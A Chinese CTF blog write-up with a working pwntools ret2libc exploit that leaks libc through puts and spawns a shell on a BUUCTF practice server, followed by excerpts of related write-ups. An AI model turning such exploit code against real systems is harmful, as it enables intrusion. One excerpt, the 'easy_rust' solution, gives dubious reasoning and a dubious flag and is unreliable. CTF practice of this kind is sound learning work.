关于BUUCTF 之bjdctf_2020_babyrop的wp的最实在解释

最新推荐文章于 2024-08-01 09:51:58 发布
原创 最新推荐文章于 2024-08-01 09:51:58 发布 · 937 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #linux #网络

这篇博客展示了如何使用Python的`os`和`pwn`库来实现远程服务器的内存操作,包括发送payload修改内存地址,获取`puts`函数地址,计算`system`和`bin/sh`地址,并执行系统命令。关键步骤包括构造payload,发送数据,以及交互接收返回信息。 
from os import system
from pwn import*
context.log_level='debug'
p=remote('node4.buuoj.cn',25535)
libc_ = ELF('./libc-2.23.so')
elf = ELF('./2020')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
#p.recvuntil("Pull up your sword and tell me u story!")
#p.recv(3)
paylaod = 'a'*0x28 + p64(0x400733 )+p64(puts_got) +  p64(puts_plt)    +  p64(0x4006ad)  
p.sendline(paylaod)
p.recv()#this is important because of it ,the flag can be get
addr_=u64(p.recv(6).ljust(8,'\x00'))
#addr_=u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))

print(hex(addr_))
base_=addr_-libc_.symbols['puts']
system_=base_ + libc_.symbols['system']
bin_=base_+libc_.search('/bin/sh').next()
pay = 'a'*0x28 + p64(0x400733) +p64(bin_) + p64(system_)
#p.recv(3)
#p.recvuntil("Pull up your sword and tell me u story!")
p.sendline(pay)
p.interactive()

这里addr_=u64(p.recv(6).ljust(8,'\x00'))这一句这个之所以这样写:我们首先来看接收到的write的地址,利用print(hex(addr_))的两种结果:
1:在这里插入图片描述
2:利用print((addr_))的结果:
在这里插入图片描述
通过以上两种输出我们可以看到,这个选着接收6个字符是由地址的16进制形式,这里是:0x7f4cb1e36690数一下可以发现是6个字节

另外本题还需要注意的是利用context.log_level='debug'时,再gdb里观察可以发现和远程程序交流的收、发数据情况,由此正确使用p.recv语句。关于题目的思路其余师傅的wp讲的很清楚,正常解法。

[CTF]bjdctf_2020_babyrop2
m0_50819561的博客
10-07 611
格式化字符串漏洞+金丝雀绕过。 出现这种形式的,v2就是canary。 查看他在栈里的位置。 var_8就是canary。 利用格式化字符串漏洞。 %6$p表示输出第六个参数。 发现我们输入的东西在第六个参数的位置。 调试之后发现有一串随机的十六进制数字。这就是canary。由此可见,这个canary在第七个参数的位置。 于是我们先用格式话字符串泄露第七个参数位置上的内容,每一次进行栈溢出的时候把泄露出来的值填入即可。 代码如下: from pwn import * from LibcSearche
bjdctf_2020_babyrop2
qq_33010875的博客
09-26 477
环境:WSL2,ubuntu16.04,python2 checksec文件: PIE保护没开,构造rop链 存在Canary,需要找出Canary的值才能进行地址泄露 文件拖入ida: 在gift函数发现printf格式化漏洞,可以利用该漏洞获取Canary的值,但需要找出输入点参数在栈上的相对位置(找偏移量) 由于scanf限制了只能输入6个字符,因此不能用 AAAA %x %x %x....... 来泄露值,改为: aa%6$p #6是一步步试出来的,可以从1开始尝试,p是十六进制形式 结
pwn7第七关
qq_18823653的博客
04-03 512
前面几个懒得写了,直接第七个吧,溢出点和前面一样get()函数,112字节,保护只开了NX程序本身没有system(),也没有/bin/sh,且栈不可执行,用ROPgadget也没找到有用的语句,但是程序是动态链接的,运行时会加载so库,可以用put()泄露出put的真实地址,又因为ASLR随机化不了地址底12位,可以用put真实地址的底12位查询加载的那个版本的libc.so,以及确定libc的...
bjdctf_2020_babyropbjdctf_2020_babyrop2(格式化字符leak)
beaster1的博客
04-06 715
bjdctf_2020_babyrop 先checksec 打开ida正常查看函数 打开init函数发现puts函数 然后进入vuln函数 存在栈溢出 没有看到后门函数应该是libc leak+rop 代码如下 from pwn import* from LibcSearcher import* p=remote('node3.buuoj.cn',29901) #p=process('') elf=ELF('bjdctf_2020_babyrop') puts_got=elf.got['puts'] p
bjdctf_2020_babyrop
m0sway的博客
04-03 719
bjdctf_2020_babyrop WriteUp BUU_PWN
BUUCTF web [BJDCTF2020]EasySearch wp
Whaocai的博客
08-02 472
考点 ①ssi注入 进去之后是一个登录框,猜测有没有register.php,经过测试也不存在sql注入。直接御剑扫描(扫buuctf上的题要调线程和超时,我是线程10超时15,不然会被平台禁掉)。扫出来了index.php.swp index.php.swp源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$
[BJDCTF2020]纳尼 -wp
freerats的博客
08-21 414
下载下来一个gif一个txt gif打不开,txt里没啥 用010打开gif看看 很明显,没文件头,加给gif文件头47494638试试 保存下来可以打开,然后发现是一张动图 然后用stegsolve打开 分离开是一段段base64
[BJDCTF2020]藏藏藏 1 wp
weixin_52599204的博客
06-25 450
BUUCTF MISC 藏藏藏
BUU-[BJDCTF2020]Easy MD5-WP
m0_62851980的博客
08-02 1005
我们只需找到md5值都是两个0e开头的字符串即可,php里面在做==,!=的时候会先把两边的类型转成一样的,0e开头,php会认为它是科学计数法,两边都是0。这样既可完成md5碰撞。也就是说我们需要找到一个字符串,它被md5加密后会含有276f7227,与万能密码原理类似。md5函数在指定了true的时候,是返回的原始16字符的二进制格式,这里是===,科学计数法不可用,但仍然可1用数组绕过,后得到flag。也就是说,需要我们找到字符串a与b不同,但在md5加密后相同的字符串。...
BJDCTF2020 --逆向题练习记录(题解wp
Air_cat的博客
07-30 733
[BJDCTF2020]JustRE 题拿到了,看起来这种点一万次的东西可能会藏东西在资源文件里,Resources Hacker看了看没东西。 那正常来看看,Exeinfo 32为VC6无壳。 查串(其实直接在处理函数那边看一眼就看到了)后在处理函数里找到猫腻,这里需要点20000次,跟我连点器比划比划?(x) 其实直接可以读出来,这里的flag是19999,0拼接那个明文。 BJD{1999920690a45792d233ac} [BJDCTF2020]easy 起手几个步骤就先忽略,, 开头就被“Ca
[BJDCTF2020]7道web题
as you know, nlp is fantasitc!
01-20 680
[BJDCTF2020]web题 写在前的话:这篇wp很长,但图片很少,因为上传过程图片重新贴太麻烦了,总共写了一次比赛的7道题,能ak的人太牛了;发现2020的题很适合去入门,题目不是很难理解,网上的资料也分析得很详细;做完这些题花了两三天,写一篇wp花了一天,希望用blog记录自己的成长 [BJDCTF2020]Easy MD5 1、第一次MD5 抓包,在响应头里面有提示 select * from 'admin' where password=md5($pass,true) pass可控,通过MD5
crypto-babyLCG(NPUCTF2020)
耐酸碱高温固化材料近距离传输研究
11-30 2467
显然如果要解密出flag明文那必须要反推出初的seed参数,将后面产生的随机数全部复原。的原因是为了保持向量各个数值bit位保持一致(关于格密码基础概念推荐这篇。因为前20个随机数的高位是已知的,接下来思路是针对这个式子做变形。其中A,B均可通过a,b,h推出。现在将以上关系式写成矩阵形式。由于h均为已知,那么现在找到低位l递推的关系式,又因为。近期研究格密码过程中遇到的一个很好的题目,记录一下。则可以推出所有低位l与l1的关系式,简写为。构造lattice,后一项取2。将s拆分为高位h和低位l变为。
BUUCTF PWN [HarekazeCTF2019]baby_rop
Rt1Text的博客
05-27 409
1.checksec+运行 64位/NX堆栈不可执行 2.IDA进行中 1.main函数 本题函数倒不是很多 很明显,格式化字符串漏洞 2.system bin/sh 3.offset 总体来看64位寄存器传参 3.EXP from pwn import* p=remote('node4.buuoj.cn',27198) shell=0x601048 system=0x400496 rdi=0x400683 payload=b'a'*(...
文件任意读取和强碰撞
qq_53142368的博客
08-31 2586
文章目录一、babypython[国赛总决赛复现]考点:硬链接读取任意文件、伪造session二、BUUCTF-[安洵杯 2019]easy_web总结 一、babypython[国赛总决赛复现] 考点:硬链接读取任意文件、伪造session 这个题当时打开是一个文件上传 然后上传一个文件 显示需要上传zipfile,当时用bp拦截 改zip 上传成功后 没有回显文件的路径 然后就卡住了 后来发现这个题考点是 硬链接读取任意文件 伪造session ln -si /app/y0u_found_it.i
baby python
2301_79935671的博客
03-25 896
原题wp参考链接:https://www.cnblogs.com/karsa/p/13529769.html。伪造,直接jwt.io伪造不了,需要SECRET_KEY。ssh连上查文件/app/y0u_found_it/y0u_found_it_main.py。解题思路是软链接zip读取文件,然后伪造admin的session读取flag。所以用软连接读取/sys/class/net/eth0/address。首先下载secrets模块,secrets模块可以提供比较强的随机数。导入secrets模块。
Buuctf(pwn)[OGeek2019]babyrop
半岛铁盒的博客
03-25 771
发现第二个函数有个read函数,但它是0x20是不能够构成漏洞利用,只是利用它作为中间的一个简单的输出即可; 跳过if判定: 只需在第一次输入时 在前面加上 ‘\0’ a1上上一次返回的 buf[7] 这里的漏洞点利用, 要保证 a1的值尽可能的大, 这里选择的是 ‘xff’ – 255 该题目已经为我们提供了Libc Exp可以这样写 from pwn import * p = remote("node3.buuoj.cn",29829) libc=ELF('libc-2.23....
[SWPUCTF 2021 新生赛]babyrce
最新发布
2301_80218721的博客
08-01 248
对这段代码进行审计,我们能从里面得到这里检测了是不是用url的get方法进行了传参,并且这里对空格进行了过滤,所以这里不能有空格,我们要用其他等价的形式对空格进行绕过。审计这段php代码我们可以发现,只要让cookie中admin=1就可以满足if的条件, 我们就能得到自己想要的回显。这里用 $IFS代替空格,实现查找根目录的功能,后再用cat查看文件里面的信息。
BUUCTF之BabyUpload[GXYCTF2019]
金 帛的博客
06-11 731
BUUCTFwp
buuctf [第五章 ctf之re章]easy_rust 高级语言逆向wp
09-17
在这个buuctf的Easy Rust高级语言逆向题目中,我们需要对给定的Rust语言程序进行逆向分析,并找到程序的存放在flag变量中的答案。 首先,我们需要使用Rust编译器将给定的源代码进行编译。然后,我们可以使用静态分析和动态调试的方法来分析程序的行为。 通过分析程序的源代码,我们可以看到在main函数中,程序会读取一个名为input的字符串,并将它与一组数字进行逐个比较。如果比较结果为真,程序会将对应位置的flag字符进行替换。 为了分析比较的逻辑,我们可以使用动态调试的工具,如GDB。在GDB中,我们可以在比较之前的位置设置一个断点。然后,我们可以逐步执行程序,并观察变量的值来分析比较的逻辑。 在此题中,我们可以发现比较的逻辑为input[i] == flag[i] + 5。这意味着,我们需要将输入字符串中的每个字符和flag中的每个字符进行比较,比较结果为真则通过。 再进一步观察flag变量,我们会发现flag的初始值为"aaaaaa"。由于我们需要找到正确的flag,我们可以把它作为初始值来尝试不断的迭代,直到找到符合比较逻辑的正确flag。 综上所述,我们可以编写一个脚本来尝试不同的flag值,并与给定的input进行比较,直到找到正确的flag。后,我们将找到的flag flag{r3v3r53_mUST_8E_"aI1_DONE"} 总结起来,buuctf的Easy Rust高级语言逆向题目通过分析Rust程序的源代码和使用动态调试工具,以及编写一个脚本来找到正确的flag值。通过理解比较逻辑和尝试不同的可能性,我们可以成功地完成这个题目。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值